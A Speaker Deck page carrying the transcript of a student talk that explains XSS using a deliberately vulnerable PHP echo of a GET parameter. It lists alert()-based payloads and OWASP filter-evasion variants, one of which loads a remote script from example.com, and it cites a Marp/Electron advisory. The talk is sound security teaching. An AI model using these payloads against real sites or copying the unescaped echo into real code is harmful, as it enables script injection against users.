Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.3k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
22
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
97
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
220
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
320
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
730
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
330
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
140
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
150
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
260
Other Decks in Technology
See All in Technology
初中級者用如何使用backlog -VALE TUDOEDITION-
in0u
0
140
20240725 LLMによるDXのビジョンと、今何からやるべきか @Azure OpenAI Service Dev Day
nrryuya
3
1.2k
技術負債による事業の失敗はなぜ起こるのか / Why do business failures due to technical debt occur?
i35_267
0
190
データベース研修 DB基礎【MIXI 24新卒技術研修】
mixi_engineers
PRO
0
220
頼られるのが大好きな 皆さんへ - 支援相手との期待の合わせ方、突き放し方 -/For_people_who_like_to_be_relied_on
naitosatoshi
1
290
AWSで”最小権限の原則”を実現するための考え方 /20240722-ssmjp-aws-least-privilege
opelab
10
4.4k
楽しくGoを学び合う、LayerXの勉強会文化 / LayerX's study culture of having fun and learning Go together
ar_tama
2
350
Azure AI ことはじめ
tsubakimoto_s
0
130
AI研修【MIXI 24新卒技術研修】
mixi_engineers
PRO
0
130
AIエージェントを現場に導入する目線とは
masahiro_nishimi
1
1.5k
MySQLのロックの種類とその競合
yoku0825
6
1.6k
AutomatedLabを使って内部ペンテストを勉強しよう! -やられ社内ネットワークの自動構築-
n_etupirka
1
610
Featured
See All Featured
How to train your dragon (web standard)
notwaldorf
79
5.5k
Building a Modern Day E-commerce SEO Strategy
aleyda
25
6.7k
The Straight Up "How To Draw Better" Workshop
denniskardys
229
130k
StorybookのUI Testing Handbookを読んだ
zakiyama
15
4.9k
Side Projects
sachag
451
42k
Visualization
eitanlees
139
14k
Why You Should Never Use an ORM
jnunemaker
PRO
51
8.9k
[RailsConf 2023] Rails as a piece of cake
palkan
35
4.4k
Designing for Performance
lara
604
67k
Music & Morning Musume
bryan
43
5.9k
The Cost Of JavaScript in 2023
addyosmani
31
4.7k
Code Reviewing Like a Champion
maltzj
517
39k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron